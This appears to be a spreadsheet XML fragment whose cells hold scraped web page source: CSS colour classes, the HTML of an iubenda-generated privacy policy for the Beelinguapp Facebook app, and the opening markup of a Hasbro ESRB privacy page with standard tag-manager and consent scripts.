			.color-page-id-15-highlight-on-hover:hover {
				color: #8749ab;
			}
			.border-color-page-id-15-background-on-hover:hover {
				border-color: #ffffff;
			}
			.border-color-page-id-15-foreground-on-hover:hover {
				border-color: #a66cf1;
			}
			.border-color-page-id-15-highlight-on-hover:hover {
				border-color: #8749ab;
			}
			.bg-color-page-id-15-background-on-hover:hover {
				background-color: #ffffff;
			}
			.bg-color-page-id-15-foreground-on-hover:hover {
				background-color: #a66cf1;
			}
			.bg-color-page-id-15-highlight-on-hover:hover {
				background-color: #8749ab;
			}
			.fill-page-id-15-background-on-hover:hover {
				fill: #ffffff;
			}
			.fill-page-id-15-foreground-on-hover:hover {
				fill: #a66cf1;
			}
			.fill-page-id-15-highlight-on-hover:hover {
				fill: #8749ab;
			}
			.stroke-page-id-15-background-on-hover:hover {
				stroke: #ffffff;
			}
			.stroke-page-id-15-foreground-on-hover:hover {
				stroke: #a66cf1;
			}
			.stroke-page-id-15-highlight-on-hover:hover {
				stroke: #8749ab;
			}
			/* When is active */
			.color-page-id-15-background-when-is-active.is-active {
				color: #ffffff;
			}
			.color-page-id-15-foreground-when-is-active.is-active {
				color: #a66cf1;
			}
			.color-page-id-15-highlight-when-is-active.is-active {
				color: #8749ab;
			}
			.border-color-page-id-15-background-when-is-active.is-active {
				border-color: #ffffff;
			}
			.border-color-page-id-15-foreground-when-is-active.is-active {
				border-color: #a66cf1;
			}
			.border-color-page-id-15-highlight-when-is-active.is-active {
				border-color: #8749ab;
			}
			.bg-color-page-id-15-background-when-is-active.is-active {
				background-color: #ffffff;
			}
			.bg-color-page-id-15-foreground-when-is-active.is-active {
				background-color: #a66cf1;
			}
			.bg-color-page-id-15-highlight-when-is-active.is-active {
				background-color: #8749ab;
			}
			.fill-page-id-15-background-when-is-active.is-active {
				fill: #ffffff;
			}
			.fill-page-id-15-foreground-when-is-active.is-active {
				fill: #a66cf1;
			}
			.fill-page-id-15-highlight-when-is-active.is-active {
				fill: #8749ab;
			}
			.stroke-page-id-15-background-when-is-active.is-active {
				stroke: #ffffff;
			}
			.stroke-page-id-15-foreground-when-is-active.is-active {
				stroke: #a66cf1;
			}
			.stroke-page-id-15-highlight-when-is-active.is-active {
				stroke: #8749ab;
			}
			.color-page-id-7-background {
				color: #ffffff;
			}
			.color-page-id-7-foreground {
				color: #828282;
			}
			.color-page-id-7-highlight {
				color: #f15f2f;
			}
			.border-color-page-id-7-background {
				border-color: #ffffff;
			}
			.border-color-page-id-7-foreground {
				border-color: #828282;
			}
			.border-color-page-id-7-highlight {
				border-color: #f15f2f;
			}
			.bg-color-page-id-7-background {
				background-color: #ffffff;
			}
			.bg-color-page-id-7-foreground {
				background-color: #828282;
			}
			.bg-color-page-id-7-highlight {
				background-color: #f15f2f;
			}
			.fill-page-id-7-background {
				fill: #ffffff;
			}
			.fill-page-id-7-foreground {
				fill: #828282;
			}
			.fill-page-id-7-highlight {
				fill: #f15f2f;
			}
			.stroke-page-id-7-background {
				stroke: #ffffff;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"&gt;
&lt;html id="iubenda_policy" class="iubenda_fixed_policy" lang="en"&gt;
&lt;head&gt;
  &lt;title&gt;Privacy Policy of Beelinguapp&lt;/title&gt;
  &lt;meta http-equiv="Content-Language" content="en" /&gt;
  &lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;
  &lt;meta http-equiv="date" content="2016-09-14"&gt;
  &lt;meta http-equiv="last-modified" content="2021-06-03"&gt;
  &lt;meta itemprop="name" content="Privacy Policy of Beelinguapp"&gt;
  &lt;meta itemprop="description" content="This Application collects some Personal Data from its Users." /&gt;
  &lt;meta itemprop="image" content="https://www.iubenda.com/seo/assets/default.png" /&gt;
  &lt;meta name="locale" content="en" /&gt;
  &lt;meta name="title" content="This Application collects some Personal Data from its Users." /&gt;
  &lt;meta name="description" content="This Application collects some Personal Data from its Users."</t>
  </si>
  <si>
    <t>/&gt;
  &lt;meta name="image" content="https://www.iubenda.com/seo/assets/default.png" /&gt;
  &lt;meta name="twitter:card" content="summary" /&gt;
  &lt;meta name="twitter:title" content="Privacy Policy of Beelinguapp" /&gt;
  &lt;meta name="twitter: description" content="This Application collects some Personal Data from its Users." /&gt;
  &lt;meta name="twitter:site" content="@iubenda" /&gt;
  &lt;meta name="twitter:image:src" content="https://www.iubenda.com/seo/assets/default.png" /&gt;
  &lt;meta property="og:title" content="Privacy Policy of Beelinguapp"&gt;
  &lt;meta property="og:description" content="This Application collects some Personal Data from its Users."</t>
  </si>
  <si>
    <t>/&gt;
  &lt;meta property="og:image" content="https://www.iubenda.com/seo/assets/default.png" /&gt;
  &lt;meta property="og:url" content="https://www.iubenda.com/privacy-policy/7910868/legal" /&gt;
  &lt;meta property="og:site_name" content="iubenda" /&gt;
  &lt;meta property="og:locale" content="en" /&gt;
  &lt;meta property="og:type" content="website" /&gt;
  &lt;meta property="fb:app_id" content="190131204371223" /&gt;
  &lt;link rel="canonical" href="https://www.iubenda.com/privacy-policy/7910868/legal" /&gt;
  &lt;meta name="viewport" content="width=device-width"&gt;
  &lt;meta name="robots" content="noindex, follow"&gt;
  &lt;link href="/assets/privacy_policy-16b326ba03c119e048c99e45e58520770a789bcd51d9d8793a0029f607758beb.css" media="screen" rel="stylesheet" /&gt;
  &lt;script src="/assets/privacy_policy-b6e881b6ade036db56b1c2b47415a0c1aa0e3b8b19dc3fe77d71a7eb83abb75b.js"&gt;&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
  &lt;script type="text/javascript"&gt;
    var $body = $('body');
    // Add `all-collapsed` class to body in order to have all the expandable panel collapsed at page load and:
    // 1. avoid the closing animation
    //</t>
  </si>
  <si>
    <t>2. allow all browsers (Firefox had issue) to scroll to an anchor if provided in the URL (e.g. #manage_cookies)
    // 3. done via JS in order to not have panels collapsed for browsers with disabled JS
    $body.addClass('all-collapsed')
       .on('click', '.expand .expand-click', function () {
        if ($body.hasClass('all-collapsed'))</t>
  </si>
  <si>
    <t>{
          // Remove `all-collapsed` class from the body and set all panels collapsed so toggleClass behaves as expected
          $('.expand-content').hide();
          $('.expand').addClass('collapsed');
          $body.removeClass('all-collapsed');
        }
        var $this = $(this);
        $this.parents('.expand').toggleClass('collapsed').toggleClass('expanded')
          .children('.expand-content').slideToggle('fast');
         $this.parents('.expand-item').toggleClass('hover');
        $this.children('.icon-17').toggleClass('icon-expand').toggleClass('icon-collapse');
      });
  &lt;/script&gt;
  &lt;div id="wbars_all"&gt;
  &lt;div class="iub_container iub_base_container"&gt;
    &lt;div id="wbars"&gt;
      &lt;div class="iub_content legal_pp"&gt;
&lt;div class="iub_header"&gt;
    &lt;h1&gt;Privacy Policy of the &lt;strong&gt;Beelinguapp&lt;/strong&gt; Facebook app&lt;/h1&gt;
      &lt;p&gt;</t>
  </si>
  <si>
    <t>In order to receive information about your Personal Data, the purposes and the parties the Data is shared with, contact the Owner.&lt;/p&gt;
&lt;/div&gt; &lt;!-- /header --&gt;
&lt;div class="one_line_col"&gt;
  &lt;h2 id="owner_of_the_data"&gt;
    Owner and Data Controller
  &lt;/h2&gt;
      &lt;p&gt;David Montiel&lt;/p&gt;
      &lt;p&gt;&lt;strong&gt;Owner contact email:&lt;/strong&gt; montidavid@gmail.com&lt;/p&gt;
&lt;/div&gt;
&lt;div class="one_line_col"&gt;
  &lt;h2 id="types_of_data"&gt;
    Types of Data collected
  &lt;/h2&gt;
      &lt;p&gt; The owner does not provide a list of Personal Data types collected.&lt;/p&gt;
  &lt;p&gt;Complete details on each type of Personal Data collected are provided in the dedicated sections of this privacy policy or by specific explanation texts displayed prior to the Data collection.&lt;br</t>
  </si>
  <si>
    <t>/&gt;Personal Data may be freely provided by the User, or, in case of Usage Data, collected automatically when using this Application.&lt;br /&gt;Unless specified otherwise, all Data requested by this Application is mandatory and failure to provide this Data may make it impossible for this Application to provide its services. In cases where this Application specifically states that some Data is not mandatory, Users are free not to communicate this Data without consequences to the availability or the functioning of the Service.&lt;br /&gt;Users who are uncertain about which Personal Data is mandatory are welcome to contact the Owner.&lt;br /&gt;Any use of Cookies – or of other tracking tools – by this Application or by the owners of third-party services used by this Application serves the purpose of providing the Service required by the User, in addition to any other purposes described in the present document and in the Cookie Policy, if available.&lt;/p&gt;
  &lt;p&gt;Users are responsible for any third-party Personal Data obtained, published or shared through this Application and confirm that they have the third party's consent to provide the Data to the Owner.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="one_line_col"&gt;
  &lt;h2 id="place_of_processing"&gt;Mode and place of processing the Data&lt;/h2&gt;
  &lt;h3&gt;Methods of processing&lt;/h3&gt;
  &lt;p&gt; The Owner takes appropriate security measures to prevent unauthorized access, disclosure, modification, or unauthorized destruction of the Data.&lt;br /&gt;The</t>
  </si>
  <si>
    <t>Data processing is carried out using computers and/or IT enabled tools, following organizational procedures and modes strictly related to the purposes indicated. In addition to the Owner, in some cases, the Data may be accessible to certain types of persons in charge, involved with the operation of this Application (administration, sales, marketing, legal, system administration) or external parties (such as third-party technical service providers, mail carriers, hosting providers, IT companies, communications agencies) appointed, if necessary, as Data Processors by the Owner. The updated list of these parties may be requested from the Owner at any time.&lt;/p&gt;
  &lt;h3&gt;Legal basis of processing&lt;/h3&gt;
  &lt;p&gt;</t>
  </si>
  <si>
    <t>The Owner may process Personal Data relating to Users if one of the following applies:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Users have given their consent for one or more specific purposes. Note: Under some legislations the Owner may be allowed to process Personal Data until the User objects to such processing (“opt-out”), without having to rely on consent or any other of the following legal bases. This, however, does not apply, whenever the processing of Personal Data is subject to European data protection law;&lt;/li&gt;
    &lt;li&gt;provision of Data is necessary for the performance of an agreement with the User and/or for any pre-contractual obligations thereof;&lt;/li&gt;
    &lt;li&gt;processing is necessary for compliance with a legal obligation to which the Owner is subject;&lt;/li&gt;
    &lt;li&gt;processing is related to a task that is carried out in the public interest or in the exercise of official authority vested in the Owner;&lt;/li&gt;
    &lt;li&gt;processing is necessary for the purposes of the legitimate interests pursued by the Owner or by a third party.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;</t>
  </si>
  <si>
    <t>In any case, the Owner will gladly help to clarify the specific legal basis that applies to the processing, and in particular whether the provision of Personal Data is a statutory or contractual requirement, or a requirement necessary to enter into a contract. &lt;/p&gt;
  &lt;h3&gt;Place&lt;/h3&gt;
  &lt;p&gt; The Data is processed at the Owner's operating offices and in any other places where the parties involved in the processing are located.&lt;br /&gt;&lt;br /&gt;
Depending on the User's location, data transfers may involve transferring the User's Data to a country other than their own.</t>
  </si>
  <si>
    <t>To find out more about the place of processing of such transferred Data, Users can check the section containing details about the processing of Personal Data.&lt;/p&gt;
  &lt;p&gt;Users are also entitled to learn about the legal basis of Data transfers to a country outside the European Union or to any international organization governed by public international law or set up by two or more countries, such as the UN, and about the security measures taken by the Owner to safeguard their Data.&lt;br /&gt;&lt;br /&gt;
 If any such transfer takes place, Users can find out more by checking the relevant sections of this document or inquire with the Owner using the information provided in the contact section.&lt;/p&gt;
  &lt;h3&gt;Retention time&lt;/h3&gt;
  &lt;p&gt;Personal Data shall be processed and stored for as long as required by the purpose they have been collected for.&lt;/p&gt;
  &lt;p&gt;Therefore:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Personal Data collected for purposes related to the performance of a contract between the Owner and the User shall be retained until such contract has been fully performed.&lt;/li&gt;
    &lt;li&gt;Personal Data collected for the purposes of the Owner’s legitimate interests shall be retained as long as needed to fulfill such purposes. Users may find specific information regarding the legitimate interests pursued by the Owner within the relevant sections of  this document or by contacting the Owner.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;</t>
  </si>
  <si>
    <t>The Owner may be allowed to retain Personal Data for a longer period whenever the User has given consent to such processing, as long as such consent is not withdrawn. Furthermore, the Owner may be obliged to retain Personal Data for a longer period whenever required to do so for the performance of a legal obligation or upon order of an authority.&lt;br /&gt;&lt;br /&gt;
Once the retention period expires, Personal Data shall be deleted. Therefore, the right of access, the right to erasure, the right to rectification and the right to data portability cannot be enforced after expiration of the retention period.&lt;/p&gt;
&lt;/div&gt;
  &lt;div class="one_line_col"&gt;
    &lt;h2 id="use_collected_data"&gt;The purposes of processing&lt;/h2&gt;
    &lt;p&gt;For specific information about the Personal Data used for each purpose, the User may refer to the section “Detailed information on the processing of Personal Data”.&lt;/p&gt;
  &lt;/div&gt;
  &lt;div class="one_line_col"&gt;
    &lt;h2 id="facebook_permissions"&gt;Facebook permissions asked by this Application&lt;/h2&gt;
    &lt;p&gt;</t>
  </si>
  <si>
    <t>This Application may ask for some Facebook permissions allowing it to perform actions with the User's Facebook account and to retrieve information, including Personal Data, from it. This service allows this Application to connect with the User's account on the Facebook social network, provided by Facebook Inc.&lt;/p&gt;
    &lt;p&gt;For more information about the following permissions, refer to the &lt;a href="https://developers.facebook.com/docs/facebook-login/permissions" target="_blank" rel="noopener"&gt;Facebook permissions documentation&lt;/a&gt; and to the &lt;a href="https://www.facebook.com/about/privacy/" target="_blank" rel="noopener"&gt;Facebook privacy policy&lt;/a&gt;.&lt;/p&gt;
      &lt;p&gt; The permissions asked are the following:&lt;/p&gt;
      &lt;h3&gt;Basic information&lt;/h3&gt;
      &lt;p&gt;By default, this includes certain User&amp;rsquo;s Data such as id, name, picture, gender, and their locale.</t>
  </si>
  <si>
    <t>Certain connections of the User, such as the Friends, are also available. If the User has made more of their Data public, more information will be available.&lt;/p&gt;
  &lt;/div&gt;
&lt;div data-locale="en"&gt;&lt;/div&gt;
&lt;div data-locale="en"&gt;&lt;/div&gt;
&lt;div class="one_line_col"&gt;
  &lt;h2 id="rights_subjects"&gt;The rights of Users&lt;/h2&gt;
  &lt;p&gt;Users may exercise certain rights regarding their Data processed by the Owner.&lt;/p&gt;
  &lt;p&gt;In particular, Users have the right to do the following:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;strong&gt;Withdraw their consent at any time.&lt;/strong&gt; Users have the right to withdraw consent where they have previously given their consent to the processing of their Personal Data.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Object to processing of their Data.&lt;/strong&gt; Users have the right to object to the processing of their Data if the processing is carried out on a legal basis other than consent. Further details are provided in the dedicated section below.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Access their Data.&lt;/strong&gt; Users have the right to learn if Data is being processed by the Owner, obtain disclosure regarding certain aspects of the processing and obtain a copy of the Data undergoing processing.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Verify and seek rectification.&lt;/strong&gt; Users have the right to verify the accuracy of their Data and ask for it to be updated or corrected.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Restrict the processing of their Data.&lt;/strong&gt; Users have the right, under certain circumstances, to restrict the processing of their Data.</t>
  </si>
  <si>
    <t>In this case, the Owner will not process their Data for any purpose other than storing it.
 &lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Have their Personal Data deleted or otherwise removed.&lt;/strong&gt; Users have the right, under certain circumstances, to obtain the erasure of their Data from the Owner.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Receive their Data and have it transferred to another controller.&lt;/strong&gt;</t>
  </si>
  <si>
    <t>Users have the right to receive their Data in a structured, commonly used and machine readable format and, if technically feasible, to have it transmitted to another controller without any hindrance. This provision is applicable provided that the Data is processed by automated means and that the processing is based on the User's consent, on a contract which the User is part of or on pre-contractual obligations thereof.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Lodge a complaint.&lt;/strong&gt; Users have the right to bring a claim before their competent data protection authority.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3&gt;Details about the right to object to processing&lt;/h3&gt;
  &lt;p&gt;Where Personal Data is processed for a public interest, in the exercise of an official authority vested in the Owner or for the purposes of the legitimate interests pursued by the Owner, Users may object to such processing by providing a ground related to their particular situation to justify the objection.&lt;/p&gt;
  &lt;p&gt;Users must know that, however, should their Personal Data be processed for direct marketing purposes, they can object to that processing at any time without providing any justification. To learn, whether the Owner is processing Personal Data for direct marketing purposes, Users may refer to the relevant sections of this document.</t>
  </si>
  <si>
    <t>&lt;/p&gt;
  &lt;h3&gt;How to exercise these rights&lt;/h3&gt;
  &lt;p&gt; Any requests to exercise User rights can be directed to the Owner through the contact details provided in this document. These requests can be exercised free of charge and will be addressed by the Owner as early as possible and always within one month.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="one_line_col"&gt;
  &lt;h2 id="further_data_processing_info"&gt;Additional information about Data collection and processing&lt;/h2&gt;
  &lt;h3&gt;Legal action&lt;/h3&gt;
  &lt;p&gt;The User's Personal Data may be used for legal purposes by the Owner in Court or in the stages leading to possible legal action arising from improper use of this Application or the related Services.&lt;br /&gt;The</t>
  </si>
  <si>
    <t>User declares to be aware that the Owner may be required to reveal personal data upon request of public authorities.&lt;/p&gt;
  &lt;h3&gt;Additional information about User's Personal Data&lt;/h3&gt;
  &lt;p&gt; In addition to the information contained in this privacy policy, this Application may provide the User with additional and contextual information concerning particular Services or the collection and processing of Personal Data upon request.&lt;/p&gt;
  &lt;h3&gt;System logs and maintenance&lt;/h3&gt;
  &lt;p&gt;For operation and maintenance purposes, this Application and any third-party services may collect files that record interaction with this Application (System logs) use other Personal Data (such as the IP Address) for this purpose.&lt;/p&gt;
  &lt;h3&gt;Information not contained in this policy&lt;/h3&gt;
  &lt;p&gt;More details concerning the collection or processing of Personal Data may be requested from the Owner at any time. Please see the contact information at the beginning of this document.&lt;/p&gt;
    &lt;h3&gt;How “Do Not Track” requests are handled&lt;/h3&gt;
    &lt;p&gt;</t>
  </si>
  <si>
    <t>This Application does not support “Do Not Track” requests.&lt;br /&gt;To determine whether any of the third-party services it uses honor the “Do Not Track” requests, please read their privacy policies.&lt;/p&gt;
  &lt;h3&gt;Changes to this privacy policy&lt;/h3&gt;
  &lt;p&gt;The Owner reserves the right to make changes to this privacy policy at any time by notifying its Users on this page and possibly within this Application and/or - as far as technically and legally feasible - sending a notice to Users via any contact information available to the Owner. It is strongly recommended to check this page often, referring to the date of the last modification listed at the bottom.</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;
 Should the changes affect processing activities performed on the basis of the User’s consent, the Owner shall collect new consent from the User, where required.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="one_line_col"&gt;
  &lt;div class="box_primary box_10 definitions expand"&gt;
    &lt;h3 id="definitions_and_legal_references" class="expand-click w_icon_24 icon_ribbon"&gt;
      Definitions and legal references
    &lt;/h3&gt;
    &lt;div class="expand-content"&gt;
      &lt;h4&gt;Personal Data (or Data)&lt;/h4&gt;
      &lt;p&gt;Any information that directly, indirectly, or in connection with other information — including a personal identification number — allows for the identification or identifiability of a natural person.&lt;/p&gt;
      &lt;h4&gt;Usage Data&lt;/h4&gt;
      &lt;p&gt;Information collected automatically through this Application (or third-party services employed in this Application), which can include: the IP addresses or domain names of the computers utilized by the Users who use this Application, the URI addresses (Uniform Resource Identifier), the time of the request, the method utilized to submit the request to the server, the size of the file received in response, the numerical code indicating the status of the server's answer (successful outcome, error, etc.), the country of origin, the features of the browser and the operating system utilized by the User, the various time details per visit (e.g., the time spent on each page within the Application) and the details about the path followed within the Application with special reference to the sequence of pages visited, and other parameters about the device operating system and/or the User's IT environment.&lt;/p&gt;
      &lt;h4&gt;User&lt;/h4&gt;
      &lt;p&gt;The individual using this Application who, unless otherwise specified, coincides with the Data Subject.&lt;/p&gt;
      &lt;h4&gt;Data Subject&lt;/h4&gt;
      &lt;p&gt;The natural person to whom the Personal Data refers.&lt;/p&gt;
      &lt;h4&gt;Data Processor (or Data Supervisor)&lt;/h4&gt;
      &lt;p&gt;The natural or legal person, public authority, agency or other body which processes Personal Data on behalf of the Controller, as described in this privacy policy.&lt;/p&gt;
       &lt;h4&gt;Data Controller (or Owner)&lt;/h4&gt;
      &lt;p&gt;The natural or legal person, public authority, agency or other body which, alone or jointly with others, determines the purposes and means of the processing of Personal Data, including the security measures concerning the operation and use of this Application.</t>
  </si>
  <si>
    <t>The Data Controller, unless otherwise specified, is the Owner of this Application.&lt;/p&gt;
      &lt;h4&gt;This Application&lt;/h4&gt;
      &lt;p&gt; The means by which the Personal Data of the User is collected and processed.&lt;/p&gt;
      &lt;h4&gt;Service&lt;/h4&gt;
      &lt;p&gt; The service provided by this Application as described in the relative terms (if available) and on this site/application.&lt;/p&gt;
      &lt;h4&gt;European Union (or EU)&lt;/h4&gt;
      &lt;p&gt;Unless otherwise specified, all references made within this document to the European Union include all current member states to the European Union and the European Economic Area.&lt;/p&gt;
      &lt;hr /&gt;
      &lt;h4&gt;Legal information&lt;/h4&gt;
      &lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">This privacy statement has been prepared based on provisions of multiple legislations, including Art. 13/14 of Regulation (EU) 2016/679 (General Data Protection Regulation).&lt;/p&gt;
      &lt;p&gt; This privacy policy relates solely to this Application, if not stated otherwise within this document.&lt;/p&gt;
     &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;div class="iub_footer"&gt;
  &lt;p&gt;
    Latest update: May 25, 2018
  &lt;/p&gt;
		</t>
  </si>
  <si>
    <t>&lt;p&gt;
      &lt;a target="_top" href="https://www.iubenda.com/en/privacy-and-cookie-policy-generator" title="iubenda - Privacy Policy generator"&gt;iubenda&lt;/a&gt; hosts this content and only collects &lt;a target="_top" href="//www.iubenda.com/privacy-policy/65675001"&gt;the Personal Data strictly necessary&lt;/a&gt; for it to be provided.
		 &lt;/p&gt;
          &lt;a href="//www.iubenda.com/privacy-policy/7910868" title="Show the simplified Privacy Policy" class="show_comp_link iframe-preserve an-preserve"&gt;Show the simplified Privacy Policy&lt;/a&gt;
&lt;/div&gt; &lt;!-- /footer --&gt;
&lt;script type="text/javascript"&gt;
  window.tryFunc = function(fName,args){
    if(typeof window[fName]==='function'){
      window[fName](args);
    }else{
      if(args){
        /* default behaviour is link */
        if(args.href){
          /* default link is target='_blank' */
          window.open(args.href)
        }
      }
    }
    return false; /* inhibit default behaviour */
  }
&lt;/script&gt;
      &lt;/div&gt; &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">/content --&gt;
    &lt;/div&gt; &lt;!-- /wbars --&gt;
      &lt;div class="iub_footer"&gt;
        &lt;p&gt;Privacy Policy generated with &lt;a href="//www.iubenda.com" class="no_border" title="iubenda" target="_blank" rel="noopener"&gt;&lt;img alt="iubenda" src="//www.iubenda.com/assets/site/logo_min.png" /&gt;&lt;/a&gt;&lt;/p&gt;
          &lt;a href="//www.iubenda.com" target="_blank" rel="noopener" class="btn iubgreen" title="Generate a privacy policy"&gt;Generate yours&lt;/a&gt;
      &lt;/div&gt;
  &lt;/div&gt; &lt;!-- /container base_container --&gt;
&lt;/div&gt; &lt;!-- /wbars_wrapper --&gt;
  &lt;script type="text/javascript"&gt;
    var privacyPolicy = new PrivacyPolicy({
      id:635953,
      noBrand:false
    })
    $(document).ready(function() {
      privacyPolicy.start();
    });
  &lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang=en-us&gt;&lt;head&gt;&lt;title&gt;App Esrb Privacy&lt;/title&gt;&lt;link rel=icon href="/favicon.ico"/&gt;&lt;meta charSet=utf-8 /&gt;&lt;meta http-equiv=content-language content=en /&gt;&lt;meta name=viewport content="width=device-width, initial-scale=1"/&gt;&lt;meta name=author content=Hasbro /&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=Edge"/&gt;&lt;meta name=google-site-verification content=BEGWYPokLdfQ8LUrnhUEof9j6RKkjyzyof5dJJuNw1g /&gt;&lt;meta name=description content="Hasbro App Esrb Privacy"/&gt;&lt;meta name=keywords content="Hasbro, Docs, App Esrb Privacy"/&gt;&lt;meta property=og:title content="App Esrb Privacy"/&gt;&lt;meta property=og:description content="Hasbro App Esrb Privacy"/&gt;&lt;meta property=og:image content="https://assets-us-01.kc-usercontent.com/500e0a65-283d-00ef-33b2-7f1f20488fe2/d71d7064-f62d-4a05-ba7b-815f3495964f/hasbrologo.png"/&gt;&lt;meta property=og:url content="/legal/app_esrb_privacy"/&gt;&lt;meta property=og:site_name content=docs /&gt;&lt;meta name=ps-account content=1712 /&gt;&lt;meta name=ps-config content=579a43c73963a0526b3c0c96 /&gt;&lt;meta name=ps-language content=en /&gt;&lt;meta name=ps-country content=us /&gt;&lt;link href="https://fast.fonts.net/cssapi/b89eb762-f7bb-4adb-89a1-b460ae7f1165.css" rel=stylesheet /&gt;&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
	new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
	j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
	'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-T3SPCRT');&lt;/script&gt;&lt;link rel=icon href="/favicon.ico"/&gt;&lt;meta name=next-head-count content=22 /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel=preconnect href="https://cdn.fonts.net"/&gt;&lt;link href="https://cdn.fonts.net/kit/9b24f5cd-e900-45bc-8083-d75a0ac4a921/9b24f5cd-e900-45bc-8083-d75a0ac4a921.css" rel=stylesheet /&gt;&lt;script src="https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location"&gt;&lt;/script&gt;&lt;script src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js" charSet=UTF-8 data-domain-script=59411009-21b8-4f12-b06c-3a235d9e2209&gt;&lt;/script&gt;&lt;link rel=preload href="/_next/static/css/bfdae5a8b0ae60f7.css" as=style /&gt;&lt;link rel=stylesheet href="/_next/static/css/bfdae5a8b0ae60f7.css" data-n-g=""/&gt;&lt;noscript data-n-css=""&gt;&lt;/noscript&gt;&lt;script defer nomodule="" src="/_next/static/chunks/polyfills-0d1b80a048d4787e.js"&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/webpack-fe2c99c80e3d5a8b.js" defer&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/framework-40605f9fdf0fe0ab.js" defer&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/main-facbfcdb7aca73c9.js" defer&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/pages/_app-e241e37c7297601a.js" defer&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/9779-7a98659d2f590e99.js" defer&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/3062-c9165835ae9e9598.js" defer&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/7582-ccdffa9793e9ecb1.js" defer&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/4793-c474f11ece29f2c0.js" defer&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/pages/legal/app_esrb_privacy-d1966acb1cfd631e.js" defer&gt;&lt;/script&gt;&lt;script src="/_next/static/q2Lns2W2Fl_RHjZQ5ej1R/_buildManifest.js" defer&gt;&lt;/script&gt;&lt;script src="/_next/static/q2Lns2W2Fl_RHjZQ5ej1R/_ssgManifest.js" defer&gt;&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;div id=__next&gt;&lt;div class="w-full mx-auto"&gt;&lt;div class="privacy-pages mx-auto max-w-[100vw] p-5 md:p-0" id=app_esrb_privacy&gt;&lt;div class="flex justify-end py-8" id=Hasbro&gt;&lt;span style="box-sizing:border-box;display:inline-block;overflow:hidden;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;position:relative;max-width:100%"&gt;&lt;span style="box-sizing:border-box;display:block;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;max-width:100%"&gt;&lt;img style="display:block;max-width:100%;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0" alt="" aria-hidden=true src="data:image/svg+xml,%3csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20version=%271.1%27%20width=%2776%27%20height=%27102%27/%3e"/&gt;&lt;/span&gt;&lt;img alt="esrb logo" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" decoding=async data-nimg=intrinsic style="position:absolute;top:0;left:0;bottom:0;right:0;box-sizing:border-box;padding:0;border:none;margin:auto;display:block;width:0;height:0;min-width:100%;max-width:100%;min-height:100%;max-height:100%"/&gt;&lt;noscript&gt;&lt;img alt="esrb logo" srcSet="/_next/image?url=https%3A%2F%2Fassets-us-01.kc-usercontent.com%3A443%2F500e0a65-283d-00ef-33b2-7f1f20488fe2%2Ff3938904-8e1d-4bda-be11-56cb45861a3c%2Fesrb_privacy_certified.png&amp;amp;w=96&amp;amp;q=75 1x, /_next/image?url=https%3A%2F%2Fassets-us-01.kc-usercontent.com%3A443%2F500e0a65-283d-00ef-33b2-7f1f20488fe2%2Ff3938904-8e1d-4bda-be11-56cb45861a3c%2Fesrb_privacy_certified.png&amp;amp;w=256&amp;amp;q=75 2x" src="/_next/image?url=https%3A%2F%2Fassets-us-01.kc-usercontent.com%3A443%2F500e0a65-283d-00ef-33b2-7f1f20488fe2%2Ff3938904-8e1d-4bda-be11-56cb45861a3c%2Fesrb_privacy_certified.png&amp;amp;w=256&amp;amp;q=75" decoding=async data-nimg=intrinsic style="position:absolute;top:0;left:0;bottom:0;right:0;box-sizing:border-box;padding:0;border:none;margin:auto;display:block;width:0;height:0;min-width:100%;max-width:100%;min-height:100%;max-height:100%" loading=lazy /&gt;&lt;/noscript&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir=ltr class="heading 